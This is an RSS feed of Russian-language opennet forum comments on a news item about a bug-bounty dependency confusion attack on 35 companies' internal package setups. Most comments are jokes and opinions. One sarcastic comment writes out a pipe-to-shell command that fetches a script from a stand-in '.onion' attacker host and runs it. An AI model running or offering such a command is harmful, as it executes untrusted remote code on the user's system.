<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Атака на зависимости позволила выполнить код на серверах PayPal, Micrоsoft, Apple, Netflix, Uber и ещё 30 компаний</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html</link>
    <description>Представлен поразительный по своей простоте метод атаки на зависимости в приложениях, при разработке которых используются внутренние репозитории пакетов. Выявившие проблему исследователи смогли выполнить свой код на внутренних серверах 35 компаний, среди которых  PayPal, Micrоsoft, Apple, Netflix, Uber, Tesla и Shopify. Взломы проводились в рамках программ Bug Bounty, согласованно с атакуемыми компаниями, и уже принесли авторам 130 тысяч долларов, выплаченных в форме вознаграждений за выявление уязвимостей (выплаты продолжают поступать)...&lt;br&gt;&lt;br&gt;Подробнее: https://www.opennet.ru/opennews/art.shtml?num=54566&lt;br&gt;</description>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (Sample)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#205</link>
    <pubDate>Mon, 01 Mar 2021 11:58:29 GMT</pubDate>
    <description>Наши деды славные  победы, вот  где  наши  деды  &lt;br&gt;</description>
</item>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (RedEyedMan)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#204</link>
    <pubDate>Fri, 26 Feb 2021 11:09:05 GMT</pubDate>
    <description>Вполне нормальное явление. Иначе зачем все эти либы и фреймворки, сильные обойдутся и без них. А я слабый, пользуюсь либами и фреймворками.&lt;br&gt;</description>
</item>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (rico)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#203</link>
    <pubDate>Thu, 18 Feb 2021 15:52:05 GMT</pubDate>
    <description>Принцип модульности Орлова: если из распечатки одного модуля программы можно свить веревку, на которой можно повесить программиста, его написавшего, то все это следует сделать.&lt;br&gt;</description>
</item>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (rex)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#202</link>
    <pubDate>Thu, 18 Feb 2021 10:30:56 GMT</pubDate>
    <description>В смысле, никто не думал заранее?&lt;br&gt;&lt;br&gt;Я всегда считал это багом многих утилит работы с пакетами.&lt;br&gt;&lt;br&gt;А вот, например, в &#096;docker pull&#096; явно прописывается адрес регистри. &lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (Аноним)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#201</link>
    <pubDate>Tue, 16 Feb 2021 15:46:17 GMT</pubDate>
    <description>А в яйце игла&lt;br&gt;</description>
</item>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (Аноним)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#200</link>
    <pubDate>Mon, 15 Feb 2021 11:14:53 GMT</pubDate>
    <description>Ваш комментарий в моей голове был озвучен голосом нежити из Варкрафта 3 )) &lt;br&gt;</description>
</item>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (Аноним)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#199</link>
    <pubDate>Sun, 14 Feb 2021 20:56:14 GMT</pubDate>
    <description>в русте зависимости ставятся через wget https://sploit.onion/l33t.sh &amp;#124; bash. до менеджера пакета форк-бомба просто не дойдёт - сработает раньше. безопасность же.&lt;br&gt;</description>
</item>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (Аноним)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#198</link>
    <pubDate>Sun, 14 Feb 2021 05:14:07 GMT</pubDate>
    <description>&amp;gt; давайте тогда делать вебсайты без этих ваших фреймворков и MVC, будем складывать &lt;br&gt;&amp;gt; все в условный index.php, чтобы чувствовать себя сильными кодерами &lt;br&gt;&lt;br&gt;ЧСХ пока так делали - работало явно лучше. Во всяком случае, гиг RAM на рендер не жрало и не грузилось по 5 минут, даже несмотря на тормозные диалапы с GPRS и ADSL-ями.&lt;br&gt;</description>
</item>

<item>
    <title>Атака на зависимости позволила выполнить код на серверах Pay... (Аноним)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/123238.html#197</link>
    <pubDate>Sun, 14 Feb 2021 02:43:24 GMT</pubDate>
    <description>На этот случай есть безопасТное восстановление паролей через ваши безопасТные мобильники. Номера на которых сейчас не подделывает только ленивый.&lt;br&gt;</description>
</item>

</channel>
</rss>
